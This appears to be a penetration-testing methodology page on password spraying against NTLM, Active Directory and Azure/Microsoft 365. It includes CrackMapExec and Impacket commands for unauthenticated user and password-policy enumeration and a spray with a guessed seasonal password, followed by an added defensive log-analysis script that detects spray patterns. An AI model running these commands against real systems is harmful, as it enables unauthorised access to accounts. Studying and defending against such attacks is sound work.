Secondary Categories: 02 - Initial Access 02 - Credential Access 02 - Privilege Escalation 02 - Lateral Movement Links: Common Password List
Description:
Some applications allow users, or client applications such as browsers, to authenticate over HTTP using NTLM. To find these applications, a tool such as NTLMRecon can be used to identify the endpoints against which a password spray can be attempted.
NTLMRecon outputs a CSV list of the endpoints it identified, which can be passed to SprayCharles to attempt to gain access to an account.
External
This section contains some of my methodology and tips for performing password spraying attacks from an external attacker's perspective.
There are a lot of great open source tools out there to do this. I suggest using TREVORspray.
With this tool you can round-robin through multiple different SSH sessions, use multiple modules/methods to spray, spoof the User-Agent, and set a delay/jitter.
For a list of common passwords, please refer to: Common Password List
Internal
When conducting internal password spraying it is important to keep in mind that this action is very loud. I also highly recommend enumerating the domain's password policy before beginning.
Password Policy
Enumerate Password Policy

```bash
# Get Password Policy with CrackMapExec (Unauthenticated / null session)
cme smb $dc -u '' -p '' --pass-pol
# Get Password Policy with CrackMapExec (Authenticated)
crackmapexec smb $dc -u $username -p $password --pass-pol
```

```powershell
# Get Password Policy with Net Accounts
net accounts
# Enumerate the default password policy settings from the Default Domain Policy GPO
Get-ADDefaultDomainPasswordPolicy
```

Fine-Grained Password Policy:

```powershell
# Enumerate all FGPPs configured
Get-ADFineGrainedPasswordPolicy -Filter *
# Obtain the FGPP assigned to a specific user
Get-ADUserResultantPasswordPolicy -Identity JSmith
```
Gathering Domain Users
Once you have enumerated the password policy, if you don't already have a list of all domain users, I recommend gathering this information next.
```bash
# Get List of Users and Groups with CrackMapExec via RID Cycling (Unauthenticated / null session)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups
# Get List of Users with CrackMapExec (Authenticated)
crackmapexec smb $dc -u $username -p $password --users
# Get List of Users with Impacket
impacket-GetADUsers $domain/$username:$password -all -dc-ip $dc
```
Spraying
```bash
# Spray a single password across a list of users with CrackMapExec
# (the password is single-quoted so the shell does not expand the '!')
crackmapexec smb $ip -u $username_list -p 'Winter2022!' --continue-on-success
```
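From the defender's side, the commands above leave a very distinctive footprint: one source producing failed logons against many distinct accounts, with only one or two failures per account (the opposite shape of a brute force against a single user). The following Python script is an added example, not part of these notes or of any tool listed here. It runs a sliding-window detector over constructed sample log lines loosely modelled on Windows Security event 4625 (the line layout, IP addresses and usernames are assumptions), and also includes a source-agnostic check for the case where the spray is routed through rotating proxies, as TREVORspray's SSH round-robin would do.

```python
"""Password-spray detection over constructed failed-logon records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

# Constructed sample log: '<ISO timestamp> <event id> <source ip> <target user>'.
# 4625 = failed logon, 4624 = successful logon (ignored by the parser).
SAMPLE_LOG = """\
# 10.0.0.5: one attempt against each of six accounts in ten seconds (spray shape)
2024-01-15T09:00:01 4625 10.0.0.5 jsmith
2024-01-15T09:00:03 4625 10.0.0.5 akhan
2024-01-15T09:00:05 4625 10.0.0.5 mlee
2024-01-15T09:00:07 4625 10.0.0.5 rpatel
2024-01-15T09:00:09 4625 10.0.0.5 tnguyen
2024-01-15T09:00:11 4625 10.0.0.5 bwong
# 10.0.0.9: repeated failures against a single account (brute-force shape)
2024-01-15T09:02:00 4625 10.0.0.9 admin
2024-01-15T09:02:05 4625 10.0.0.9 admin
2024-01-15T09:02:10 4625 10.0.0.9 admin
2024-01-15T09:02:15 4625 10.0.0.9 admin
2024-01-15T09:02:20 4625 10.0.0.9 admin
# 10.0.0.22: a user mistyping a password, then succeeding
2024-01-15T09:05:00 4625 10.0.0.22 JSmith
2024-01-15T09:05:10 4624 10.0.0.22 JSmith
2024-01-15T09:06:00 4625 10.0.0.22 mlee
# 198.51.100.x: one failure per account, each from a different source
2024-01-15T09:10:00 4625 198.51.100.10 cdiaz
2024-01-15T09:10:30 4625 198.51.100.11 ehall
2024-01-15T09:11:00 4625 198.51.100.12 fkim
2024-01-15T09:11:30 4625 198.51.100.13 gpark
"""


class LogonFailure(NamedTuple):
    when: datetime
    source: str
    user: str


def parse_log(text: str) -> List[LogonFailure]:
    """Keep only failed logons (event id 4625); usernames are case-folded
    because 'JSmith' and 'jsmith' are the same account to the DC."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, event_id, src, user = line.split()
        if event_id != "4625":
            continue
        records.append(LogonFailure(datetime.fromisoformat(ts), src, user.lower()))
    return records


def max_distinct_users(evs: List[LogonFailure], window: timedelta) -> int:
    """Largest number of distinct accounts failing inside any window-long
    span of the given events (two-pointer sliding window)."""
    evs = sorted(evs, key=lambda r: r.when)
    counts: Dict[str, int] = defaultdict(int)  # user -> failures in window
    best = start = 0
    for r in evs:
        counts[r.user] += 1
        while r.when - evs[start].when > window:  # evict events that fell out
            old = evs[start].user
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def spray_sources(records, window=timedelta(minutes=30), min_users=5) -> Dict[str, int]:
    """Per-source detector: {source: distinct accounts} for sources that hit
    at least min_users distinct accounts within one window. Breadth of
    accounts, not volume per account, is what separates a spray from a
    brute force."""
    by_source: Dict[str, List[LogonFailure]] = defaultdict(list)
    for r in records:
        by_source[r.source].append(r)
    flagged = {}
    for src, evs in by_source.items():
        n = max_distinct_users(evs, window)
        if n >= min_users:
            flagged[src] = n
    return flagged


def distributed_spray(records, window=timedelta(minutes=30), min_users=8) -> int:
    """Source-agnostic detector for sprays behind rotating proxies: distinct
    accounts failing across ALL sources in one window. Returns the count if
    it reaches min_users, else 0."""
    n = max_distinct_users(records, window)
    return n if n >= min_users else 0


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("per-source spray candidates:", spray_sources(recs))
    print("distinct accounts failing tenant-wide:", distributed_spray(recs))
```

On the sample data only `10.0.0.5` trips the per-source check; the brute force from `10.0.0.9` does not, because it touches a single account. The source-agnostic count, by contrast, sees eleven distinct accounts failing in the window, which is the signal that survives IP rotation, at the cost of needing a higher threshold to stay above the organisation's normal background of mistyped passwords.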
Azure
The tools listed below (see Resources) provide several ways to enumerate users and password spray against Azure AD / Microsoft 365, using a number of different authentication endpoints and modules:
- activesync
- adfs
- autodiscover
- autologon
- oauth2
- reporting
- rst
Resources:
| Title | URL |
|---|---|
NTLMRecon | https://github.com/pwnfoo/NTLMRecon |
SprayCharles | https://github.com/Tw1sm/spraycharles |
Password Spraying | https://www.sprocketsecurity.com/blog/how-to-bypass-mfa-all-day |
Creating a fine grained password policy | https://specopssoft.com/blog/create-fine-grained-password-policy-active-directory/ |
Azure AD Password Spray Attacks with PowerShell and How to Defend your Tenant | https://danielchronlund.com/2020/03/17/azure-ad-password-spray-attacks-with-powershell-and-how-to-defend-your-tenant/ |
MSOLSpray Github | https://github.com/dafthack/MSOLSpray |
o365Spray tool | https://github.com/0xZDH/o365spray |
o365enum tool | https://github.com/gremwell/o365enum |
UhOh365 | https://github.com/Raikia/UhOh365 |
MailSniper | https://github.com/dafthack/MailSniper |
Ruler | https://github.com/sensepost/ruler |